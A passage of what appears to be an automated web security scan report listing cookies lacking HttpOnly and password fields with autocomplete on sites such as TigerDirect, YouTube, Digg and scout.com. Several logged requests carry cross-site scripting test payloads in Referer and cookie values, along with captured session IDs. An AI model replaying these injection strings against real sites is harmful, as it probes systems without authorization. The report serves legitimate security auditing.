Server: Microsoft-IIS/6.0
X-SV: MIA01A
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private
Content-Type: text/html
Expires: Sat, 29 Jan 2011 15:14:42 GMT
Cache-Control: no-cache
Vary: Accept-Encoding
Date: Sun, 30 Jan 2011 15:14:42 GMT
Connection: close
Set-Cookie: SRCCODE=WEB1101; expires=Tue, 01-Mar-2011 05:00:00 GMT; path=/
Set-Cookie: SRVR=WEBX12%2D06B; path=/
Content-Length: 1476


<HTML>
<HEAD>
<TITLE>Your TigerDirect.com Shopping Cart</TITLE>
<META NAME="Generator" CONTENT="EditPlus">
<META NAME="Author" CONTENT="">
<META NAME="Keywords" CONTENT="">
<META NAME="Descrip
...[SNIP]...

17.498. http://www.tigerdirect.com/sectors/sweepstakes/asus/asusCoreI7Giveaway_popUnder.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tigerdirect.com
Path:   /sectors/sweepstakes/asus/asusCoreI7Giveaway_popUnder.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sectors/sweepstakes/asus/asusCoreI7Giveaway_popUnder.asp HTTP/1.1
Host: www.tigerdirect.com
Proxy-Connection: keep-alive
Referer: http://www.tigerdirect.com/applications/SearchTools/item-details.asp?EdpNo=6532393796d4'%3balert(document.cookie)//5a2dd2f7153
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pop%5Fcheck=active; visited=tempyes; Cart=Landing=http%3A%2F%2Fwww%2Etigerdirect%2Ecom%2Fapplications%2FSearchTools%2Fitem%2Ddetails%2Easp%3FEdpNo%3D6532393796d4%27%253balert%28document%2Ecookie%29%2F%2F5a2dd2f7153&Referer=; SessionId=2663007120110130101436173193214243; SSLB=0; SRCCODE=WEB1101; SRVR=WEBX12%2D06B; ASP.NET_SessionId=kjgyls45inwxcw55ezidnd45; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&ItemDetailsBeta=Y&msProduct=1782290&msRandX=44&CaptchaTextVal=9895C6C99F6C; CoreID6=35034674045812964005411&ci=90203773; CoreAt=90203773=1|1|0|0|0|0|0|0|0|0|0|0|1|1296400541||&; 90203773_clogin=l=1296400541&v=1&e=1296402343043

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIA01A
X-Powered-By: ASP.NET
Content-Length: 802
Content-Type: text/html
Cache-Control: private
Vary: Accept-Encoding
Date: Sun, 30 Jan 2011 15:14:47 GMT
Connection: close
Set-Cookie: SRVR=WEBX10%2D07A; path=/
Set-Cookie: SRCCODE=WEB1101; expires=Tue, 01-Mar-2011 05:00:00 GMT; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

17.499. http://www.tigerdirect.com/secure/captcha/Default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tigerdirect.com
Path:   /secure/captcha/Default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /secure/captcha/Default.aspx HTTP/1.1
Host: www.tigerdirect.com
Proxy-Connection: keep-alive
Referer: http://www.tigerdirect.com/applications/SearchTools/item-details.asp?EdpNo=6532393796d4'%3balert(document.cookie)//5a2dd2f7153
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pop%5Fcheck=active; visited=tempyes; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&ItemDetailsBeta=Y&msProduct=1782290&msRandX=44; SRVR=WEBX10%2D07A; Cart=Landing=http%3A%2F%2Fwww%2Etigerdirect%2Ecom%2Fapplications%2FSearchTools%2Fitem%2Ddetails%2Easp%3FEdpNo%3D6532393796d4%27%253balert%28document%2Ecookie%29%2F%2F5a2dd2f7153&Referer=; SessionId=2663007120110130101436173193214243; SRCCODE=WEB1101; SSLB=0

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIA01A
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 384
Date: Sun, 30 Jan 2011 15:14:42 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ASP.NET_SessionId=kjgyls45inwxcw55ezidnd45; path=/; HttpOnly
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&ItemDetailsBeta=Y&msProduct=1782290&msRandX=44&CaptchaTextVal=9895C6C99F6C; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>

...[SNIP]...

17.500. http://www.youtube.com/embed/CKZzn00w01M

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /embed/CKZzn00w01M

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /embed/CKZzn00w01M HTTP/1.1
Host: www.youtube.com
Proxy-Connection: keep-alive
Referer: http://cartoonblog.msnbc.redacted/?9bcba%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea8948eec705=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:55:03 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: GEO=3887f2ae992adacf44a634e80b061986cwsAAAAzVVOtwdbzTUWl9w==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 9225

<!DOCTYPE html>
<html>
<head>
<title>YouTube - Egyptian Cartoonist Operates Just Under the Censorship Radar</title>

<link rel="stylesheet" href="http://s.ytimg.com/yt/cssbin/www-embed-vflPrz
...[SNIP]...

17.501. http://www.youtube.com/embed/mm8byzo8zWE

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /embed/mm8byzo8zWE

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /embed/mm8byzo8zWE HTTP/1.1
Host: www.youtube.com
Proxy-Connection: keep-alive
Referer: http://cartoonblog.msnbc.redacted/?9bcba%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea8948eec705=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:55:03 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: GEO=3887f2ae992adacf44a634e80b061986cwsAAAAzVVOtwdbzTUWl9w==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 9216

<!DOCTYPE html>
<html>
<head>
<title>YouTube - Interview with Australian Cartoonist Peter Broelman</title>

<link rel="stylesheet" href="http://s.ytimg.com/yt/cssbin/www-embed-vflPrzZNL.css">
...[SNIP]...

18. Password field with autocomplete enabled
There are 54 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


18.1. http://digg.com/search

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /search

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /search HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:21:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=24569 10.2.128.190
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 7917


<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Search
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, po
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

18.2. http://eurekalert.org/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://eurekalert.org
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: eurekalert.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:08:14 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
X-Powered-By: PHP/4.4.4
Connection: close
Content-Type: text/html
Content-Length: 64809

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org /TR/REC-html40/loose.dtd">
<html>
<head>
<title>EurekAlert! - Science News</title>
<meta http-equiv=content-type c
...[SNIP]...
</tr>
       <form action="http://www.eurekalert.org/login.php" name="login" method="POST">
<tr>
...[SNIP]...
<img src="http://www.eurekalert.org/images/shared/spacer.gif" width="12" height="6" alt="" /><input type="PASSWORD" name="password" size="15" class="IB_InputMedium" maxlength="31" onChange="document.login.click()"></td>
...[SNIP]...

18.3. https://login.silverlight.net/login/signin.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /login/signin.aspx

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

POST /login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fshowcase%2fdefault.aspx HTTP/1.1
Host: login.silverlight.net
Connection: keep-alive
Referer: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fshowcase%2fdefault.aspx
Cache-Control: max-age=0
Origin: https://login.silverlight.net
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=d2ro42a2hvkbut554hcs2zuf; forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dlogin.silverlight.net/login/signin.aspx%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257Bjavascript%25253AWebForm_DoPostBackWithOptions%252528newWebForm_PostBackOptions%252528%252522ctl00%252524ma%2526oidt%253D2%2526ot%253DSUBMIT
Content-Length: 233

__LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTEyNjc1MTYyMTZkZO%2FafV0CJRP%2B2ILM8De2o6zEhcVm&__EVENTVALIDATION=%2FwEWAgLNm4PjCwL0iqHzAh9XOTMNktAsCvWQ8c3pqepo2pjW&ctl00%24mainMid
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx; domain=login.silverlight.net; expires=Sat, 29-Jan-2011 23:27:51 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:51 GMT
Content-Length: 15108


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   The Of
...[SNIP]...
</p>
<form name="aspnetForm" method="post" action="signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fshowcase%2fdefault.aspx" onsubmit="javascript:return WebForm_OnSubmit();" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_mainMiddle_loginForm_btnLogin')" id="aspnetForm">
<div>
...[SNIP]...
</label>
<input name="ctl00$mainMiddle$loginForm$txtPassword" type="password" id="ctl00_mainMiddle_loginForm_txtPassword" tabindex="2" style="width:200px;" /></span>
...[SNIP]...

18.4. http://msn.chemistry.com/cp/landing/44762

Summary

Severity:   Low
Confidence:   Certain
Host:   http://msn.chemistry.com
Path:   /cp/landing/44762

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /cp/landing/44762?trackingid=516068&bannerid=2117632 HTTP/1.1
Host: msn.chemistry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:49:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: ETL=MID=037f54bf-c459-4cb1-bdf0-dea3bb4b0e7c; expires=Sun, 29-Jan-2012 23:49:14 GMT; path=/
Set-Cookie: Site=CCOUNT=1&CCDATE=1/29/2011; expires=Sun, 29-Jan-2012 23:49:14 GMT; path=/
Set-Cookie: Session=SID=429C52FF-5BAA-4D34-9E95-19BBC144E553&Th=10&TID=516068; path=/
Set-Cookie: UMID=0e49d04c-67dc-4d95-b16f-dca26b7d5ee9; expires=Sun, 29-Jan-2012 23:49:14 GMT; path=/
Set-Cookie: Tracking=; expires=Mon, 01-Jan-1900 06:00:00 GMT; path=/
Set-Cookie: Tracking=A=0&G=0&GS=0&UID=0&Reg=0&RegDt=1/1/1900&Sub=0&CC=0&SC=0&CIC=0&PC=0; expires=Sun, 29-Jan-2012 06:00:00 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 28579

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="CPPageView_ctl00_head1">
<title>Chemistry a new online dating
...[SNIP]...
</div> <form class="register" id="frmReg" method="POST"> <input name="hdnPROID" type="hidden" value="1"/>
...[SNIP]...
<td colspan="3"><input name="password" type="password" id="password" class="columnWidth" style="font-family:Verdana, Arial, Helvetica, sans-serif; font-size:9px;" /></td>
...[SNIP]...

18.5. http://msn.chemistry.com/cp/landing/44762

Summary

Severity:   Low
Confidence:   Certain
Host:   http://msn.chemistry.com
Path:   /cp/landing/44762

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /cp/landing/44762 HTTP/1.1
Host: msn.chemistry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:49:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: ETL=MID=d278fc94-dbd7-4a08-8cb6-0a6b0f3e8a2e; expires=Sun, 29-Jan-2012 23:49:11 GMT; path=/
Set-Cookie: Site=CCOUNT=1&CCDATE=1/29/2011; expires=Sun, 29-Jan-2012 23:49:11 GMT; path=/
Set-Cookie: Session=SID=99B544F5-72EC-4453-B766-5821666E8BC4&Th=11&TID=508259; path=/
Set-Cookie: UMID=c7fdb268-bc89-4e0a-b9a5-5a3cbc611c0e; expires=Sun, 29-Jan-2012 23:49:11 GMT; path=/
Set-Cookie: Tracking=; expires=Mon, 01-Jan-1900 06:00:00 GMT; path=/
Set-Cookie: Tracking=A=0&G=0&GS=0&UID=0&Reg=0&RegDt=1/1/1900&Sub=0&CC=0&SC=0&CIC=0&PC=0; expires=Sun, 29-Jan-2012 06:00:00 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 28579

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="CPPageView_ctl00_head1">
<title>Chemistry a new online dating
...[SNIP]...
</div> <form class="register" id="frmReg" method="POST"> <input name="hdnPROID" type="hidden" value="1"/>
...[SNIP]...
<td colspan="3"><input name="password" type="password" id="password" class="columnWidth" style="font-family:Verdana, Arial, Helvetica, sans-serif; font-size:9px;" /></td>
...[SNIP]...

18.6. http://msn.chemistry.com/cp/landing/57269

Summary

Severity:   Low
Confidence:   Certain
Host:   http://msn.chemistry.com
Path:   /cp/landing/57269

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /cp/landing/57269 HTTP/1.1
Host: msn.chemistry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:49:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: ETL=MID=8529a559-f7f1-4949-aed2-acc51bf1723b; expires=Sun, 29-Jan-2012 23:49:06 GMT; path=/
Set-Cookie: Site=CCOUNT=1&CCDATE=1/29/2011; expires=Sun, 29-Jan-2012 23:49:06 GMT; path=/
Set-Cookie: Session=SID=A963DE98-E013-45FE-A22F-7F3E03113FAE&Th=11&TID=508259; path=/
Set-Cookie: UMID=6abfa29e-5c60-42a5-b7be-7db42c89c8cb; expires=Sun, 29-Jan-2012 23:49:06 GMT; path=/
Set-Cookie: Tracking=; expires=Mon, 01-Jan-1900 06:00:00 GMT; path=/
Set-Cookie: Tracking=A=0&G=0&GS=0&UID=0&Reg=0&RegDt=1/1/1900&Sub=0&CC=0&SC=0&CIC=0&PC=0; expires=Sun, 29-Jan-2012 06:00:00 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 30079

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="CPPageView_ctl00_head1">
<title>Chemistry a new online dating
...[SNIP]...
<!--START REG FORM FIELDS --> <form class="register" id="frmReg" method="POST"> <input name="hdnPROID" type="hidden" value="1"/>
...[SNIP]...
<td colspan="3"><input name="password" type="password" id="password" class="columnWidth" style="font-family:Verdana, Arial, Helvetica, sans-serif; font-size:9px;" /></td>
...[SNIP]...

18.7. http://msn.chemistry.com/cp/landing/57269

Summary

Severity:   Low
Confidence:   Certain
Host:   http://msn.chemistry.com
Path:   /cp/landing/57269

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /cp/landing/57269?trackingid=516068&bannerid=2117936&gt1=26000 HTTP/1.1
Host: msn.chemistry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:49:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: ETL=MID=f00ab6b3-aecc-4459-8981-db2d0d694a4c; expires=Sun, 29-Jan-2012 23:49:10 GMT; path=/
Set-Cookie: Site=CCOUNT=1&CCDATE=1/29/2011; expires=Sun, 29-Jan-2012 23:49:10 GMT; path=/
Set-Cookie: Session=SID=673ADD47-7B69-4D31-9679-2681D209F5D8&Th=13&TID=516068; path=/
Set-Cookie: UMID=50d7f413-d359-4fff-aa18-c4bfcd946574; expires=Sun, 29-Jan-2012 23:49:10 GMT; path=/
Set-Cookie: Tracking=; expires=Mon, 01-Jan-1900 06:00:00 GMT; path=/
Set-Cookie: Tracking=A=0&G=0&GS=0&UID=0&Reg=0&RegDt=1/1/1900&Sub=0&CC=0&SC=0&CIC=0&PC=0; expires=Sun, 29-Jan-2012 06:00:00 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 30079

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="CPPageView_ctl00_head1">
<title>Chemistry a new online dating
...[SNIP]...
<!--START REG FORM FIELDS --> <form class="register" id="frmReg" method="POST"> <input name="hdnPROID" type="hidden" value="1"/>
...[SNIP]...
<td colspan="3"><input name="password" type="password" id="password" class="columnWidth" style="font-family:Verdana, Arial, Helvetica, sans-serif; font-size:9px;" /></td>
...[SNIP]...

18.8. http://msn.chemistry.com/cp/landing/57269

Summary

Severity:   Low
Confidence:   Certain
Host:   http://msn.chemistry.com
Path:   /cp/landing/57269

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /cp/landing/57269?trackingid=516068&bannerid=2117936 HTTP/1.1
Host: msn.chemistry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:49:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: ETL=MID=6f41ea2e-099d-4faf-baad-60917bfedb99; expires=Sun, 29-Jan-2012 23:49:08 GMT; path=/
Set-Cookie: Site=CCOUNT=1&CCDATE=1/29/2011; expires=Sun, 29-Jan-2012 23:49:08 GMT; path=/
Set-Cookie: Session=SID=4A15DA07-7D47-4FFA-9D6B-BFCCD012B62C&Th=10&TID=516068; path=/
Set-Cookie: UMID=7520ca2e-e5a7-4da6-a3c1-3ade5a050562; expires=Sun, 29-Jan-2012 23:49:08 GMT; path=/
Set-Cookie: Tracking=; expires=Mon, 01-Jan-1900 06:00:00 GMT; path=/
Set-Cookie: Tracking=A=0&G=0&GS=0&UID=0&Reg=0&RegDt=1/1/1900&Sub=0&CC=0&SC=0&CIC=0&PC=0; expires=Sun, 29-Jan-2012 06:00:00 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 30079

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="CPPageView_ctl00_head1">
<title>Chemistry a new online dating
...[SNIP]...
<!--START REG FORM FIELDS --> <form class="register" id="frmReg" method="POST"> <input name="hdnPROID" type="hidden" value="1"/>
...[SNIP]...
<td colspan="3"><input name="password" type="password" id="password" class="columnWidth" style="font-family:Verdana, Arial, Helvetica, sans-serif; font-size:9px;" /></td>
...[SNIP]...

18.9. https://secure.scout.com/a.z

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.scout.com
Path:   /a.z

Issue detail

The page contains a form with the following action URL:

The form contains the following password fields with autocomplete enabled:

Request

GET /a.z?s=143&p=5&c=3&redirecturl=http%3a%2f%2frecruiting.scout.com%2fa.z%3fs%3d73%26p%3d9%26c%3d4%26pid%3d88 HTTP/1.1
Host: secure.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.5.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:50:54 GMT
Server: Microsoft-IIS/6.0
Server: Secure2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 17437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7;IE=EmulateIE8
...[SNIP]...
</TR><FORM NAME="create" METHOD=post ACTION="https://secure.scout.com/a.z?s=143&p=5&c=3&redirecturl=http%3a%2f%2frecruiting.scout.com%2fa.z%3fs%3d73%26p%3d9%26c%3d4%26pid%3d88"><TR>
...[SNIP]...
<br /><INPUT STYLE="font-family: Courier New" NAME=Password TYPE=password TABINDEX=10 SIZE=20 MAXLENGTH=20 VALUE=""><br />
...[SNIP]...
<br /><INPUT STYLE="font-family: Courier New" NAME=Password2 TYPE=password TABINDEX=11 SIZE=20 MAXLENGTH=20 VALUE=""></TD>
...[SNIP]...

18.10. https://secure.scout.com/a.z

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.scout.com
Path:   /a.z

Issue detail

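The page contains a form with the following action URL:
  https://secure.scout.com/a.z?s=143&p=5&c=3&redirecturl=http%3a%2f%2frecruiting.scout.com%2fa.z%3fs%3d73%26p%3d9%26c%3d4%26pid%3d88'%26yr%3d2011
The form contains the following password fields with autocomplete enabled:
  Password
  Password2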

Request

GET /a.z?s=143&p=5&c=3&redirecturl=http%3A//recruiting.scout.com/a.z%3Fs%3D73%26p%3D9%26c%3D4%26pid%3D88%27%26yr%3D2011 HTTP/1.1
Host: secure.scout.com
Connection: keep-alive
Referer: http://recruiting.scout.com/a.z?s=73&p=9&c=4&pid=88'&yr=2011
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; RefId=0; BrandId=0; SessionBrandId=0; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; __utmc=202704078; __utmb=202704078.3.9.1296350699791

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:25:06 GMT
Server: Microsoft-IIS/6.0
